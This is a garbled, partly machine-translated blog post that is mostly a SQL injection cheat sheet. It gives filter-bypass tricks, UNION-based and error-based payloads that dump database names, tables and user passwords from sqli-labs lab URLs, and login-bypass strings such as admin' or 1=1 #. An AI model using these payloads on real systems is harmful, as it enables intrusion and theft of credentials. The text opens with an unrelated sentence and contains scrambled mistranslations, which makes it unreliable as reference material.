In fact, she does not like you, just lonely, you just hit the go, you just nice to her, you can just into her eyes, she just does not refuse to come forward, all of which are just right. . .
A, MYSQL statement
Create a database
create database test;
Select the database to be operated
user test
Create a table
create table aiyou ( id int, username varchar(20), password varchar(30));
Inserting data into the table
insert into aiyou values(1,‘admin’,‘456’);
insert into aiyou values(2,‘boss’,‘123’);
insert into aiyou values (3, ' ttt', '123'), (3, 'qqq', '321' ');
Show all records in the table aiyou
select * from aiyou;
lookup tables satisfying the condition from aiyou record id = 1
select * from aiyou where id=1;
Aiyou lookup table from the condition record id = 1, and displays only the contents of the username and password fields
select username,password from aiyou where id=1;
Find aiyou recording condition satisfies the table id = 1 and username = "admin" of
select * from aiyou where id=1 and username=“admin”;
Find aiyou recording condition satisfies the table id = 1 or username = "boss" of
* aiyou the WHERE the above mentioned id from the SELECT = 1 or username = "BOSS";
drop the Test Database; delete the database
drop table test; delete the table
update aiyou set password=‘111’ where username=‘boss’ 更新数据
delete from aiyou where username=‘boss’; 删除数据
select load_file(‘c:/111.txt’); 读文件
show databases; 显示当前数据库
show tables;显示选择的数据的所有表
show create table aiyou \G;显示表结构的详细数据
describe 表名;显示表结构,大写可以自动补全
select database(); 显示当前数据库
select version() 显示数据库版本
select user() 显示当前用户
select now();显示当前时间
select system_user();获取系统用户名
select current_user();获取当前用户名
select session_user();连接数据库的用户名
select @@datadir; 读取数据库路径
select @@basedir;mysql安装路径
select @@version_compile_os; 操作系统
二、数据库连接
Third, the anti-bypass injection
Goal: http:? //Www.aiyou .com id = 1
1, bypassing the case
http://www.aiyou .com?id=1 And 1=1
2, double the bypass
http://www.aiyou .com?id=1 aandnd 1=1
3, bypassing 00%
http://www.aiyou .com?id=1 a%00nd 1=1
Fourth, manual injection
1, http:? //192.168.21.140/sqli/Less-2/index.php id = 1 and 1 = 1 returns to normal
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1 = 2 error is returned, indicating the presence injection
2, determines the number of columns
http://192.168.21.140/sqli/Less-2/index.php?id=1 order by 3 to return to normal, 4 returned an error is returned, indicating the presence of three
3, the joint inquiry
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,2,3 将2或3输入我们想要查询的内容
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,version(),database(),获取当前数据库及数据库版本
4、获取表名
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=‘security’ 获取security数据库下的表名
5、获取列名
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users’ 获取users表下的列名
6、获取字段内容
http://192.168.21.140/sqli/Less-2/index.php?id=1 and 1=2 union select 1,group_concat(username),group_concat(password) from users
五、报错注入
1、获取数据库用户
http://192.168.21.137/sqli/Less-1/index.php?id=1’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select user()limit 0,1))a from information_schema.tables group by a)b --+
2、获取数据库名称
http://192.168.21.137/sqli/Less-1/index.php?id=1’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select database()limit 0,1))a from information_schema.tables group by a)b --+
http://192.168.21.137/sqli/Less-1/index.php?id=1’ and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
3、获取当前数据库名称,返回的是一个十六进制,需要还原
http://192.168.21.137/sqli/Less-1/index.php?id=1’ and (select 1 from(select count(*),concat((select(select concat(0x7e,0x27,hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
4、获取表名
http://192.168.21.137/sqli/Less-1/index.php?id=1’ and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
5、获取字段
http://192.168.21.137/sqli/Less-1/index.php?id=1’and(select 1 from(select count(*),concat((select(select (select distinct concat(0x7e,0x27,column_name,0x27,0x7e) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 2,1))from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
6、获取字段内容
http://192.168.21.137/sqli/Less-1/index.php?id=1’ and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x7e,password,0x27,0x7e) FROM users LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
六、后台绕过
1、admin’#
2、admin’ or 1=1 #
3、‘or’=‘or’
4、admin’ or ‘1’='1
5、admin’ #
七、获取网站的根沐浴露
1、报错显示
2、site:目标网站 warning
3、遗留文件phpinfo
4, vulnerability explosive path
5, reads the configuration file
Prohibit illegal, at your peril
Welcome to public concern number: web security tool library
